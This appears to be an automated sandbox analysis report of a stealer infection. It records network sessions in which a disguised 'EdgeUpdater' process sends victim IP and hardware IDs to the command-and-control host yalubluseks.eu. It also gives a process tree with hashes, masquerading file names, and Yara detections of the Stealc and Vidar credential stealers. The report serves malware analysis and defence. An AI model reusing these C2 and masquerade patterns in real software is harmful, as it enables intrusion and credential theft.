2024-10-02 07:44:11 UTC	609	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7LVxBMSHnyx9F6KvLlYosNcjf0tOdJMoi6ber9ksgs2EABMo42rwA%2FBOuVUnRp4HjYq%2FyE%2FYkDmElSCW7HpSh8ngA8Kdcv8eXDT%2Bv7vUa7z7bINYkuPQO1hkXnJk5GWdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc310d68b9942c0-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49892	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:23 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:44:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:23 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:44:23 UTC	603	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6T0xdRlHYTIFwZaqWDt1LaS6XyiRw6X82GggU0JG0TgWcQRAxZMN4Vf%2Faazq9cSzOrak85ssQcEMqfLdWkXwTwZi2h72hVENRfO6Er2uTPft4httJXhfbUjBH7gH6ghCJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc311206db95e70-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49894	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:24 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:24 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:44:25 UTC	617	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4I9ygzVV%2F%2FNN0TzZ%2FOfDqwtJ%2FCHtA5Nqf6UVdY876V4dyb6ioj84xV%2FqMiFYu7bzRyI%2F3OI4HGeQOg85Cx853cF7%2BsPYFZiRB%2FI8NqEKXmk3RliodqoRRTj6ZNFBpNkkOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc3112acba14397-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49896	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:26 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:26 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:44:26 UTC	613	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyrUqxadLuf%2B%2BJC8yXW0QPJEx0Am9KfoHbCRa3%2BwQcN0Md0V5R%2BagxaDOy7MXSXnSsqNi5A92MQCbqnN01FR3rKRa3AfZZ04Nvs%2FHJhrxIqQSr%2BdRblhJTebW0KaRYqxAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc31133dc17421b-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49897	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:44 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:44:44 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:44:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:44 UTC	615	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvZvszv6kqh7FmxNFRvIyisvgpqJ%2BchYdRO0X7cQtYmKNaq5xeBJy%2F9nsySEPAWWcqanLE%2BF%2FK5yufGkazn0HmyUt6GhxKCp39yK%2Fj9pXHBqvi%2BT%2FWtmEJDJisx0evshjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc311a50a0c0cc4-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49899	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:45 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:45 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:44:46 UTC	613	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oznIzc5AJAPHNZF2Up4xZmiOMVtoT9VmZK%2BSzpiYI%2B80CrzN%2B19UY1L2%2Fwv4IHFMkvQfNccPl9At5xsDwWNFNmPL5%2Bplsrgpba75sP%2B3UsNOlLSPYTw4Pe7IxlCx2PwQYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc311ae9a204295-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49901	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:44:47 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:44:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:44:47 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:44:47 UTC	617	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuGV%2FVEuvJNBe6cf4XzJURrXFb%2FVghepQsm56c4c1eZsiHxLNkH82J%2BG%2FX24esFnSei9HygE2WrxiuybBa3e5RfJ2%2Bj%2FJIo5T3GHCBKhuoEZSUj%2F6Pexb7KmfsQ8xcNn%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc311b8486143ca-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49902	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:45:01 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:45:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:45:01 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:45:02 UTC	605	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w8CkZKSVABLBc9MKNbRtt1OeUA2QIVH0paUuKDz5V0%2F6b1rMtOenojWRHMEJdRJD4bXpJej98esBz2S%2FgxkwkBDsORG16VrHMzOX9n31UG95D5T4yRt1Z5p9yLlsCugy4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc312119da818cc-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49904	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:45:02 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:45:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:45:03 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:45:03 UTC	603	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qfEUBDzFwqNreaYzFbFDHcCXvXVwx8uP3PVAOrBNVZPsWF2Sy9eCF9hKCtZBJzoSLOzebWXXbxNJ%2BKLlWnRfAkGWNzPavcLZyEQEIiTeW4POasqZmoFI0pTSMHxX0ZJBbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc3121a1e084237-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49906	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:45:09 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue

Target ID:	0
Start time:	03:40:57
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x8f0000
File size:	27'136 bytes
MD5 hash:	6C7708B26AF0449F2CD1CAEF277DCE2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:40:58
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x420000
File size:	27'136 bytes
MD5 hash:	6C7708B26AF0449F2CD1CAEF277DCE2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:40:58
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
Imagebase:	0x2f0000
File size:	27'136 bytes
MD5 hash:	6C7708B26AF0449F2CD1CAEF277DCE2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:41:05
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe"
Imagebase:	0xcf0000
File size:	1'964'072 bytes
MD5 hash:	34EC7A5A9154386680A400B65CADA6CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:41:05
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:41:07
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:41:09
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x300000
File size:	27'136 bytes
MD5 hash:	6C7708B26AF0449F2CD1CAEF277DCE2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:41:10
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 944
Imagebase:	0x7f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:41:16
Start date:	02/10/2024
Path:	C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe
Imagebase:	0x970000
File size:	344'992 bytes
MD5 hash:	022CC85ED0F56A3F3E8AEC4AE3B80A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.1895049208.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:41:16
Start date:	02/10/2024
Path:	C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe
Imagebase:	0x9c0000
File size:	423'840 bytes
MD5 hash:	237AF39F8B579AAD0205F6174BB96239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:41:16
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:41:16
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:41:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:41:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x910000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:41:18
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x370000
File size:	27'136 bytes
MD5 hash:	6C7708B26AF0449F2CD1CAEF277DCE2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:41:18
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 952
Imagebase:	0x7f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:41:30
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJDHJKFIE.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:41:30
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:41:30
Start date:	02/10/2024
Path:	C:\Users\userEHJDHJKFIE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userEHJDHJKFIE.exe"
Imagebase:	0x2a0000
File size:	423'840 bytes
MD5 hash:	237AF39F8B579AAD0205F6174BB96239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:41:30
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:41:31
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAKKEGCAAE.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:41:31
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:41:31
Start date:	02/10/2024
Path:	C:\Users\userBAKKEGCAAE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userBAKKEGCAAE.exe"
Imagebase:	0xe30000
File size:	391'072 bytes
MD5 hash:	C7E7CFC3ED17AEF6C67C265389593EE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:41:31
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:41:31
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xef0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:41:33
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:41:33
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:42:13
Start date:	02/10/2024
Path:	C:\ProgramData\GHDHDBAECG.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GHDHDBAECG.exe"
Imagebase:	0x210000
File size:	391'072 bytes
MD5 hash:	C7E7CFC3ED17AEF6C67C265389593EE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:42:13
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
